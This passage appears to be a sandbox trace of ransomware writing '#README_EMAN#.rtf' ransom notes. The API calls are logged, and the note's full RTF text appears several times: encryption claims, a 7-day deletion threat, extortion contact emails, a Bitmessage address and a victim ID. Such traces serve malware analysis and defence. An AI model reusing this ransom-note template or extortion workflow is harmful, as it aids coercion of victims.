b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nêpñ\x03]Ä\x0bõ5B\x18,", lpUsedDefaultChar=0x0) returned 8717 [0269.092] WriteFile (in: hFile=0x294, lpBuffer=0x24607d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24607d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.092] CloseHandle (hObject=0x294) returned 1 [0269.092] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\#readme_eman#.rtf")) returned 0xffffffff [0269.092] GetLastError () returned 0x2 [0269.092] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0269.093] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.093] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.093] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", 